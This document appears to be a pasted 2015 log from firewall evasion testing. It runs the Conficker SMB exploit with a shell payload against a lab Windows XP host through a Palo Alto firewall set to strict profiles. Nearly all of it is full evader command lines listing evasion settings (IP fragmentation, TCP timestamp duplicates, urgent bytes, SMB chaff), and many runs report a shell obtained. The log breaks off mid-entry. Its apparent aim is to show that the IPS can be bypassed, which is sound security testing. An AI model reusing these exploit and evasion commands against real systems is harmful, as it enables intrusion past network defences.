netsecvulns

Palo Alto 7.0.3 Evader Log

Nov 29th, 2015
Palo Alto Networks Evader Log 7.0.3 December 2015
Done after applying the best practices recommended by Palo Alto here:
https://www.paloaltonetworks.com/documentation/70/pan-os/pan-os/threat-prevention/best-practices-for-securing-your-network-from-layer-4-and-layer-7-evasions.html
Configured with the strictest profiles possible (IPS, AV, ...)

PA IP is 10.62.90.3
Victim IP is 10.35.1.207
Attacker (evader) IPs are 10.62.90.110-120

Begin log file
Running exploit with command "ruby mongbat.rb --uid=webgui2_8000 --attack=conficker --payload=shell --check_victim=false --iface=eth0 --attacker=10.62.90.110 --victim=10.35.1.207 --gw=10.62.90.3 --mode=random --time=43200 --workers=10 --min_evasions=2 --max_evasions=3 --passthrough --verifydelay=1000"
2015-11-29 14:25:48 INFO Using binary /root/evader/evader version 2013.2.586 ( x86, o, evc4 )
2015-11-29 14:25:48 INFO Victim check disabled - will NOT notice if victim is no longer running
2015-11-29 14:25:50 INFO Using rand seed cMvMFqDfRtA=
2015-11-29 14:25:50 WARN evader is already running ; this may cause VICTIM CHECK FAILED messages!
2015-11-29 14:25:50 INFO External Validator: /root/evader/externals/conficker_validator.rb: Validate Conficker against Windows XP SP2
Starting evasions generator: Random evasions generator (Evasion adding percentage is 0.0028169014084507044)

0 runs averaging 0.00 runs / second ; progress: 1/43200.........................
25 runs averaging 4.00 runs / second ; progress: 6/43200.......2015-11-29 14:25:58 INFO
Success. (10.62.90.117):
/root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=52333 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=h1rO1S4WuZU --evasion=[smb_openpipe,msrpc_req]tcp_paws,"2","268435455","zero" --evasion=[smb_connect,msrpc_req]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
Info: Using random seed h1rO1S4WuZW
The following evasions are applied from stage smb_connect to msrpc_req:
- TCP timestamps echo reply value is sent in the wrong endianness
The following evasions are applied from stage smb_openpipe to msrpc_req:
- Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has 0x00 bytes as payload

Info: NetBIOS connection 10.62.90.117:52333 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: Shell closed
0: Success.
...........
44 runs averaging 3.90 runs / second ; progress: 11/43200...............
59 runs averaging 3.62 runs / second ; progress: 16/43200...............2015-11-29 14:26:10 INFO
Success. (10.62.90.119):
/root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=33234 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=cC4uchCIvqM --evasion=[msrpc_bind,end]tcp_paws,"25%","5","random_alphanum" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"3","random_alphanum" --verifydelay=1000 --payload=shell
Info: Using random seed cC4uchCIvqN
The following evasions are applied from stage smb_openpipe to msrpc_bind:
- Add a random alphanumeric urgent data byte to every 3 TCP segment.
The following evasions are applied from stage msrpc_bind to end:
- 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 5> and has random alphanumeric bytes as payload

Info: NetBIOS connection 10.62.90.119:33234 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: Command shell connection reset.
Info: CommandShell::SendCommand() - Failed to send string
Info: Shell closed
0: Success.
.2015-11-29 14:26:10 INFO
Success. (10.62.90.116):
/root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=59537 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=ePCbpjJvBgk --evasion=[start,end]tcp_inittsopt,"enable","normal" --evasion=[start,end]tcp_paws,"3","191194982","zero" --verifydelay=1000 --payload=shell
Info: Using random seed ePCbpjJvBgl
- TCP timestamps enabled, initial TCP timestamp is set to zero.
- Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 191194982> and has 0x00 bytes as payload

Info: NetBIOS connection 10.62.90.116:59537 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: CommandShell::SendCommand() - Failed to send string
Info: Command shell connection reset.
Info: Shell closed
0: Success.
............
89 runs averaging 4.17 runs / second ; progress: 21/43200..............................
119 runs averaging 4.51 runs / second ; progress: 26/43200..........................
145 runs averaging 4.61 runs / second ; progress: 31/43200....2015-11-29 14:26:23 INFO
Success. (10.62.90.112):
/root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=34345 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=GmSliZQobbI --evasion=[netbios_connect,smb_opentree]ipv4_frag,"80" --evasion=[netbios_connect,smb_opentree]ipv4_order,"lastfirst" --evasion=[smb_opentree,end]tcp_paws,"75%","5","random" --verifydelay=1000 --payload=shell
Info: Using random seed GmSliZQobbI
The following evasions are applied from stage netbios_connect to smb_opentree:
- IPv4 fragments with at most 80 bytes per fragment
- IPv4 fragments are sent in correct order except that the last fragment comes first
The following evasions are applied from stage smb_opentree to end:
- 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 5> and has random bytes as payload

Info: NetBIOS connection 10.62.90.112:34345 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: Shell closed
0: Success.
...............
165 runs averaging 4.52 runs / second ; progress: 36/43200...................
184 runs averaging 4.43 runs / second ; progress: 42/43200.....................
205 runs averaging 4.41 runs / second ; progress: 47/43200.......................
228 runs averaging 4.42 runs / second ; progress: 52/43200.2015-11-29 14:26:43 INFO
Success. (10.62.90.114):
/root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=61332 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=MTOzOSDi8Jw --evasion=[start,end]ipv4_opt,"8","inc","shuffletcp" --evasion=[smb_connect,msrpc_bind]smb_chaff,"21","write_flag","rand" --evasion=[msrpc_bind,end]tcp_paws,"1","268435455","zero" --verifydelay=1000 --payload=shell
Info: Using random seed MTOzOSDi8Jw
- Every 8th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
The duplicate packet has shuffled TCP payload
The following evasions are applied from stage smb_connect to msrpc_bind:
- Before every 21th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random payload
The following evasions are applied from stage msrpc_bind to end:
- Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has 0x00 bytes as payload

Info: NetBIOS connection 10.62.90.114:61332 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: Shell closed
0: Success.
................
246 runs averaging 4.35 runs / second ; progress: 57/43200.........
255 runs averaging 4.14 runs / second ; progress: 62/43200.
256 runs averaging 3.84 runs / second ; progress: 67/432002015-11-29 14:26:58 INFO
Success. (10.62.90.119):
/root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=29527 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=GOvj/FZON2U --evasion=[smb_connect,smb_opentree]smb_decoytrees,"7","5","7","random" --evasion=[smb_openpipe,msrpc_req]tcp_paws,"1","268435454","random_alphanum" --verifydelay=1000 --payload=shell
Info: Using random seed GOvj/FZON2U
The following evasions are applied from stage smb_connect to smb_opentree:
- Before normal SMB writes, 7 SMB trees are opened and 5 writes are performed to them. The write payload is 7 random bytes.
The following evasions are applied from stage smb_openpipe to msrpc_req:
- Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435454> and has random alphanumeric bytes as payload

Info: NetBIOS connection 10.62.90.119:29527 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: Shell closed
0: Success.
...........
268 runs averaging 3.74 runs / second ; progress: 72/43200..................
286 runs averaging 3.73 runs / second ; progress: 77/43200........2015-11-29 14:27:10 INFO
Success. (10.62.90.114):
/root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=22237 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=qVWS+7bkAvY --evasion=[smb_connect,smb_opentree]ipv4_opt,"75%","inc","random" --evasion=[smb_openpipe,end]tcp_paws,"75%","9","alphanumrandomized" --verifydelay=1000 --payload=shell
Info: Using random seed qVWS+7bkAva
The following evasions are applied from stage smb_connect to smb_opentree:
- 75% probability to send a duplicate IPv4 packet with an incrementing DWORD in the options field.
The duplicate packet has random bytes as payload
The following evasions are applied from stage smb_openpipe to end:
- 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 9> and has original payload with alphanumeric bytes randomized

Info: NetBIOS connection 10.62.90.114:22237 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: Shell closed
0: Success.
......
301 runs averaging 3.68 runs / second ; progress: 82/43200.......
308 runs averaging 3.55 runs / second ; progress: 87/43200.......
315 runs averaging 3.43 runs / second ; progress: 92/43200.........
324 runs averaging 3.35 runs / second ; progress: 97/43200.........2015-11-29 14:27:31 INFO
Success. (10.62.90.119):
/root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=33045 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=6Pjh3NY8nJk --evasion=[smb_connect,msrpc_bind]ipv4_frag,"1472" --evasion=[msrpc_bind,end]tcp_paws,"75%","4","alphanumrandomized" --verifydelay=1000 --payload=shell
Info: Using random seed 6Pjh3NY8nJn
The following evasions are applied from stage smb_connect to msrpc_bind:
- IPv4 fragments with at most 1472 bytes per fragment
The following evasions are applied from stage msrpc_bind to end:
- 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 4> and has original payload with alphanumeric bytes randomized

Info: NetBIOS connection 10.62.90.119:33045 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: Shell closed
0: Success.
.
335 runs averaging 3.29 runs / second ; progress: 102/43200.
336 runs averaging 3.15 runs / second ; progress: 107/43200....
340 runs averaging 3.04 runs / second ; progress: 112/43200....
344 runs averaging 2.94 runs / second ; progress: 117/43200.....
349 runs averaging 2.86 runs / second ; progress: 122/43200..
351 runs averaging 2.77 runs / second ; progress: 127/43200...
354 runs averaging 2.68 runs / second ; progress: 132/43200
354 runs averaging 2.59 runs / second ; progress: 137/43200.....
359 runs averaging 2.53 runs / second ; progress: 142/43200.......
366 runs averaging 2.49 runs / second ; progress: 147/43200....
370 runs averaging 2.44 runs / second ; progress: 152/43200.....
375 runs averaging 2.39 runs / second ; progress: 157/43200..
377 runs averaging 2.33 runs / second ; progress: 162/43200.....
382 runs averaging 2.29 runs / second ; progress: 167/43200......
388 runs averaging 2.26 runs / second ; progress: 172/432002015-11-29 14:28:43 INFO
Success. (10.62.90.113):
/root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=63628 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=nbC99GjwshU --evasion=[msrpc_bind,msrpc_req]smb_seg,"6" --evasion=[smb_openpipe,end]smb_writeandxpad,"1023","random_alphanum" --verifydelay=1000 --payload=shell
Info: Using random seed nbC99GjwshW
The following evasions are applied from stage smb_openpipe to end:
- 1023 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of random alphanumeric bytes.
The following evasions are applied from stage msrpc_bind to msrpc_req:
- SMB writes are segmented to contain at most 6 bytes of payload.

Info: NetBIOS connection 10.62.90.113:63628 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: CommandShell::SendCommand() - Failed to send string
Info: Command shell connection reset.
Info: Shell closed
0: Success.
.
390 runs averaging 2.20 runs / second ; progress: 177/43200
390 runs averaging 2.14 runs / second ; progress: 182/43200
390 runs averaging 2.09 runs / second ; progress: 187/43200
390 runs averaging 2.03 runs / second ; progress: 192/43200
390 runs averaging 1.98 runs / second ; progress: 197/43200
390 runs averaging 1.93 runs / second ; progress: 202/43200
390 runs averaging 1.88 runs / second ; progress: 207/43200
390 runs averaging 1.84 runs / second ; progress: 212/43200
390 runs averaging 1.80 runs / second ; progress: 217/43200
390 runs averaging 1.76 runs / second ; progress: 222/43200
390 runs averaging 1.72 runs / second ; progress: 227/43200
390 runs averaging 1.68 runs / second ; progress: 232/43200
390 runs averaging 1.64 runs / second ; progress: 237/43200
390 runs averaging 1.61 runs / second ; progress: 242/43200
390 runs averaging 1.58 runs / second ; progress: 247/43200
390 runs averaging 1.55 runs / second ; progress: 252/43200
390 runs averaging 1.52 runs / second ; progress: 257/43200
390 runs averaging 1.49 runs / second ; progress: 262/43200
390 runs averaging 1.46 runs / second ; progress: 267/43200
390 runs averaging 1.43 runs / second ; progress: 272/43200
390 runs averaging 1.41 runs / second ; progress: 277/43200
390 runs averaging 1.38 runs / second ; progress: 282/43200
390 runs averaging 1.36 runs / second ; progress: 287/43200
390 runs averaging 1.33 runs / second ; progress: 292/43200
390 runs averaging 1.31 runs / second ; progress: 297/43200
390 runs averaging 1.29 runs / second ; progress: 302/43200
390 runs averaging 1.27 runs / second ; progress: 307/43200Pid 8487 timed out - killed
2015-11-29 14:31:01 INFO
Timed out (10.62.90.117):
/root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=45741 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=LSFebZF03gA --evasion=[smb_opentree,end]smb_decoytrees,"6","2","3","random_alphanum" --evasion=[msrpc_bind,end]tcp_urgent,"8","random_alpha" --verifydelay=1000 --payload=shell
Info: Using random seed LSFebZF03gA
The following evasions are applied from stage smb_opentree to end:
- Before normal SMB writes, 6 SMB trees are opened and 2 writes are performed to them. The write payload is 3 random alphanumeric bytes.
The following evasions are applied from stage msrpc_bind to end:
- Add a random alphaurgent data byte to every 8 TCP segment.

Info: NetBIOS connection 10.62.90.117:45741 -> 10.35.1.207:445
Terminated

391 runs averaging 1.25 runs / second ; progress: 312/43200
391 runs averaging 1.23 runs / second ; progress: 317/43200Pid 8714 timed out - killed
2015-11-29 14:31:09 INFO
Timed out (10.62.90.115):
/root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=26549 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=Q4MPR/Ipdco --evasion=[smb_openpipe,msrpc_req]tcp_segvar,"8","38910" --evasion=[smb_opentree,msrpc_req]tcp_urgent,"2","zero" --verifydelay=1000 --payload=shell
Info: Using random seed Q4MPR/Ipdcp
The following evasions are applied from stage smb_opentree to msrpc_req:
- Add a zero urgent data byte to every 2 TCP segment.
The following evasions are applied from stage smb_openpipe to msrpc_req:
- TCP packets are segmented to contain between 8 and 38910 bytes of payload.

Info: NetBIOS connection 10.62.90.115:26549 -> 10.35.1.207:445
Terminated

392 runs averaging 1.22 runs / second ; progress: 322/43200...
395 runs averaging 1.21 runs / second ; progress: 327/43200.2015-11-29 14:31:20 INFO
Success. (10.62.90.117):
/root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=61076 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=ks72eUXp6pg --evasion=[start,netbios_connect]ipv4_frag,"40" --evasion=[smb_openpipe,end]tcp_paws,"1","10","random_alphanum" --verifydelay=1000 --payload=shell
Info: Using random seed ks72eUXp6pi
The following evasions are applied from stage start to netbios_connect:
- IPv4 fragments with at most 40 bytes per fragment
The following evasions are applied from stage smb_openpipe to end:
- Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 10> and has random alphanumeric bytes as payload

Info: NetBIOS connection 10.62.90.117:61076 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: Shell closed
0: Success.

397 runs averaging 1.19 runs / second ; progress: 332/43200.........
406 runs averaging 1.20 runs / second ; progress: 337/43200........
414 runs averaging 1.21 runs / second ; progress: 342/43200.Pid 9734 timed out - killed
2015-11-29 14:31:33 INFO
Timed out (10.62.90.111):
/root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=55680 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=gb9TlKpcDKQ --evasion=[netbios_connect,smb_opentree]netbios_chaff,"21","empty_unspec|small_unspec|http_post|msrpc_req" --evasion=[netbios_connect,end]tcp_recv_window,"130051" --evasion=[smb_openpipe,end]tcp_urgent,"75%","random" --verifydelay=1000 --payload=shell
Info: Using random seed gb9TlKpcDKS
The following evasions are applied from stage netbios_connect to end:
- TCP receive window is set to at most 130051 bytes.
The following evasions are applied from stage netbios_connect to smb_opentree:
- Before every 21th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is a small NetBIOS message of an unspecified type. The chaff message is an unspecified NetBIOS message with HTTP POST request like payload. The chaff message is an unspecified NetBIOS message with MSRPC request like payload.
The following evasions are applied from stage smb_openpipe to end:
- 75% probability to add a random urgent data byte to a TCP segment.

Info: NetBIOS connection 10.62.90.111:55680 -> 10.35.1.207:445
Terminated
.............
429 runs averaging 1.23 runs / second ; progress: 347/43200Pid 9930 timed out - killed
2015-11-29 14:31:38 INFO
Timed out (10.62.90.118):
/root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=52808 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=e5vVqTJ0DxU --evasion=[start,smb_openpipe]ipv4_frag,"1480" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"50%","random_alphanum" --verifydelay=1000 --payload=shell
Info: Using random seed e5vVqTJ0DxV
The following evasions are applied from stage start to smb_openpipe:
- IPv4 fragments with at most 1480 bytes per fragment
The following evasions are applied from stage smb_openpipe to msrpc_req:
- 50% probability to add a random alphanumeric urgent data byte to a TCP segment.

Info: NetBIOS connection 10.62.90.118:52808 -> 10.35.1.207:445
Terminated
...2015-11-29 14:31:40 INFO
Success. (10.62.90.115):
/root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=27985 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=g2MlQoI2/qU --evasion=[smb_connect,end]tcp_paws,"5","6","alphanumrandomized" --evasion=[msrpc_req,end]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
Info: Using random seed g2MlQoI2/qW
The following evasions are applied from stage smb_connect to end:
- Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has original payload with alphanumeric bytes randomized
The following evasions are applied from stage msrpc_req to end:
- TCP timestamps echo reply value is sent in the wrong endianness

Info: NetBIOS connection 10.62.90.115:27985 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: Shell closed
0: Success.
..
436 runs averaging 1.24 runs / second ; progress: 353/43200
436 runs averaging 1.22 runs / second ; progress: 358/43200Pid 10305 timed out - killed
2015-11-29 14:31:51 INFO
Timed out (10.62.90.112):
/root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=18240 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=lvOqSj7TLSw --evasion=[smb_connect,msrpc_req]ipv4_frag,"1480" --evasion=[msrpc_bind,msrpc_req]tcp_paws,"8","268435454","random" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"25%","random_alphanum" --verifydelay=1000 --payload=shell
Info: Using random seed lvOqSj7TLSy
The following evasions are applied from stage smb_connect to msrpc_req:
- IPv4 fragments with at most 1480 bytes per fragment
The following evasions are applied from stage smb_openpipe to msrpc_bind:
- 25% probability to add a random alphanumeric urgent data byte to a TCP segment.
The following evasions are applied from stage msrpc_bind to msrpc_req:
- Every 8th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435454> and has random bytes as payload

Info: NetBIOS connection 10.62.90.112:18240 -> 10.35.1.207:445
Terminated
....
441 runs averaging 1.22 runs / second ; progress: 363/43200.........
450 runs averaging 1.22 runs / second ; progress: 368/43200...2015-11-29 14:32:00 INFO
Success. (10.62.90.115):
/root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=11394 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=zKgv1BqIzcM --evasion=[smb_opentree,msrpc_req]netbios_chaff,"3","empty_unspec|empty_keepalive|broken_length" --evasion=[smb_connect,msrpc_req]smb_decoytrees,"5","5","2","random_msrpcbind" --evasion=[msrpc_bind,end]tcp_paws,"3","190383014","alpharandomized" --verifydelay=1000 --payload=shell
Info: Using random seed zKgv1BqIzcP
The following evasions are applied from stage smb_connect to msrpc_req:
- Before normal SMB writes, 5 SMB trees are opened and 5 writes are performed to them. The write payload is 2 bytes of MSRPC bind-like data.
The following evasions are applied from stage smb_opentree to msrpc_req:
- Before every 3th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
The following evasions are applied from stage msrpc_bind to end:
- Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 190383014> and has original payload with alphabetic bytes randomized

Info: NetBIOS connection 10.62.90.115:11394 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: Shell closed
0: Success.
.....
459 runs averaging 1.23 runs / second ; progress: 373/43200...2015-11-29 14:32:04 INFO
Success. (10.62.90.117):
/root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=60421 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=bHcAuyx6Oms --evasion=[smb_openpipe,msrpc_bind]smb_fnameobf,"change_case" --evasion=[smb_connect,msrpc_req]tcp_paws,"1","17330454","random_alphanum" --verifydelay=1000 --payload=shell
Info: Using random seed bHcAuyx6Omt
The following evasions are applied from stage smb_connect to msrpc_req:
- Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 17330454> and has random alphanumeric bytes as payload
The following evasions are applied from stage smb_openpipe to msrpc_bind:
- The SMB filename is obfuscated:
* Random characters case is changed

Info: NetBIOS connection 10.62.90.117:60421 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: CommandShell::SendCommand() - Failed to send string
Info: Command shell connection reset.
Info: Shell closed
0: Success.
......
469 runs averaging 1.24 runs / second ; progress: 378/43200
469 runs averaging 1.23 runs / second ; progress: 383/43200
469 runs averaging 1.21 runs / second ; progress: 388/43200.........
478 runs averaging 1.22 runs / second ; progress: 393/43200....Pid 10878 timed out - killed
2015-11-29 14:32:25 INFO
Timed out (10.62.90.110):
/root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=56599 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=23M8v1hEoSg --evasion=[smb_opentree,msrpc_bind]netbios_chaff,"50%","empty_unspec|small_unspec|http_get" --evasion=[smb_openpipe,end]tcp_urgent,"1","random_alphanum" --verifydelay=1000 --payload=shell
Info: Using random seed 23M8v1hEoSj
The following evasions are applied from stage smb_opentree to msrpc_bind:
- 50% probability to send a chaff NetBIOS message before an actual NetBIOS message. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is a small NetBIOS message of an unspecified type. The chaff message is an unspecified NetBIOS message with HTTP GET request like payload.
The following evasions are applied from stage smb_openpipe to end:
- Add a random alphanumeric urgent data byte to every 1 TCP segment.

Info: NetBIOS connection 10.62.90.110:56599 -> 10.35.1.207:445
Terminated
.....2015-11-29 14:32:28 INFO
Success. (10.62.90.112):
/root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=36269 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=GVmZYMBCo6c --evasion=[smb_connect,end]ipv4_frag,"464" --evasion=[smb_connect,msrpc_req]tcp_paws,"50%","116466038","zero" --evasion=[smb_openpipe,msrpc_req]tcp_segvar,"8","65534" --verifydelay=1000 --payload=shell
Info: Using random seed GVmZYMBCo6c
The following evasions are applied from stage smb_connect to end:
- IPv4 fragments with at most 464 bytes per fragment
The following evasions are applied from stage smb_connect to msrpc_req:
- 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 116466038> and has 0x00 bytes as payload
The following evasions are applied from stage smb_openpipe to msrpc_req:
- TCP packets are segmented to contain between 8 and 65534 bytes of payload.

Info: NetBIOS connection 10.62.90.112:36269 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: CommandShell::SendCommand() - Failed to send string
Info: Command shell connection reset.
Info: Shell closed
0: Success.
.
490 runs averaging 1.23 runs / second ; progress: 398/43200..Pid 10949 timed out - killed
2015-11-29 14:32:30 INFO
Timed out (10.62.90.114):
/root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=44674 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=wBfabVk6tio --evasion=[smb_opentree,smb_openpipe]smb_decoytrees,"1","4","402","zero" --evasion=[smb_opentree,msrpc_bind]tcp_paws,"21","72020197","alpharandomized" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"1","zero" --verifydelay=1000 --payload=shell
Info: Using random seed wBfabVk6tir
The following evasions are applied from stage smb_opentree to msrpc_bind:
- Every 21th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 72020197> and has original payload with alphabetic bytes randomized
  408. The following evasions are applied from stage smb_opentree to smb_openpipe:
  409. - Before normal SMB writes, 1 SMB trees are opened and 4 writes are performed to them. The write payload is 402 bytes of zeroes.
  410. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  411. - Add a zero urgent data byte to every 1 TCP segment.
  412.  
  413. Info: NetBIOS connection 10.62.90.114:44674 -> 10.35.1.207:445
  414. Terminated
  415. ..............
  416. 507 runs averaging 1.26 runs / second ; progress: 403/43200.Pid 11049 timed out - killed
  417. 2015-11-29 14:32:34 INFO
  418. Timed out (10.62.90.116):
